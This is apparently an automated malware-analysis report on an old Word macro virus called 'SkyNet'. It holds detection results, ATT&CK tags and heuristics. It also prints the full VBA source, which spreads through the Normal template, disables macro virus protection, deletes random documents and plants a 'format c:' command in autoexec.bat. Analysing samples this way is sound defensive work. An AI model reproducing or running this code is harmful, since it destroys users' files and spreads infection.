MALICIOUS
Risk Score: 240
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, specifically AutoOpen, AutoClose, and AutoExec, which are triggered automatically. The AutoExec macro attempts to write commands to C:\autoexec.bat, including 'echo s | format c:/q/V:SkyNet >nul', indicating an intent to format the C drive. The presence of legacy WordBasic markers and the specific macro names suggest a potentially older, but still dangerous, macro-based attack.
Heuristics (5)
- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9141 bytes |

SHA-256: b094b5eae9b30bfd9af957c6501d90d3072fd0ad1a7f1efb931294b0a38fc56d
Detection (ClamAV): Doc.Trojan.Skin-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "SkyNet"
Sub ViewVBcode()
a = MsgBox("No se pudo encontrar o iniciar Microsoft Visual Basic.", vbExclamation)
End Sub
Sub HerramMacro()
a = MsgBox("No se pudo encontrar o iniciar Visor de Macros.", vbExclamation)
End Sub
Sub Accion()
On Error Resume Next
If Year(Date) > 1999 Or Month(Date) > 10 Then
If Hour(Time) > 19 Then
Application.FileSearch.SearchSubFolders = True
Application.FileSearch.LookIn = Application.Options.DefaultFilePath(wdDocumentsPath)
Application.FileSearch.FileType = msoFileTypeWordDocuments
a = Application.FileSearch.Execute(msoSortByFileName, msoSortOrderAscending, True)
t = Int(Rnd * a) + 1
f$ = Application.FileSearch.FoundFiles(t)
SetAttr f$, vbNormal
Open f$ For Output As #1: Close #1
Kill f$
End If
End If
If Year(Date) > 1999 Then
If Day(Date) = 18 Then
If Hour(Time) > 19 Then
f$ = "C:\autoexec.bat"
SetAttr f$, vbNormal
Open f$ For Output As #1
Print #1, "PATH=C:\DOS;C:\WINDOWS\COMMAND;C:\WIN95\COMMAND;C:\WIN98\COMMAND\"
Print #1, "echo s | format c:/q/V:SkyNet >nul"
Close #1
End If
End If
End If
End Sub
Sub AutoClose()
On Error Resume Next
Call SkyNet
End Sub
Sub AutoOpen()
On Error Resume Next
Call SkyNet
End Sub
Sub AutoExec()
On Error Resume Next
Call Accion
End Sub
Sub SkyNet()
Attribute SkyNet.VB_Description = "Macro creada el 18/09/99 por DesMan"
Attribute SkyNet.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.SkyNet"
On Error Resume Next
Dim InfD As Boolean
Dim InfT As Boolean
Dim I
'CommandBars("tools").Controls("Macro").Delete
'CommandBars("tools").Controls("Plantillas y complementos...").Delete
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
ActiveDocument.ReadOnlyRecommended = False
InfD = False: InfT = False
For I = 1 To ActiveDocument.VBProject.vBComponents.Count
If ActiveDocument.VBProject.vBComponents(I).Name = "SkyNet" Then InfD = True
Next
For I = 1 To NormalTemplate.VBProject.vBComponents.Count
If NormalTemplate.VBProject.vBComponents(I).Name = "SkyNet" Then InfT = True
Next
If InfD = False Then
WordBasic.MacroCopy "Normal:SkyNet", WordBasic.[FileName$]() + ":SkyNet"
If NormalTemplate.Saved = False Then NormalTemplate.Save
NormalTemplate.Saved = True
End If
If InfT = False Then
WordBasic.MacroCopy WordBasic.[FileName$]() + ":SkyNet", "Normal:SkyNet"
If ActiveDocument.Saved = False Then ActiveDocument.Save
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/d6fab5ec15484c22ba2603cff6ce82a8.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/SkyNet - 8510 bytes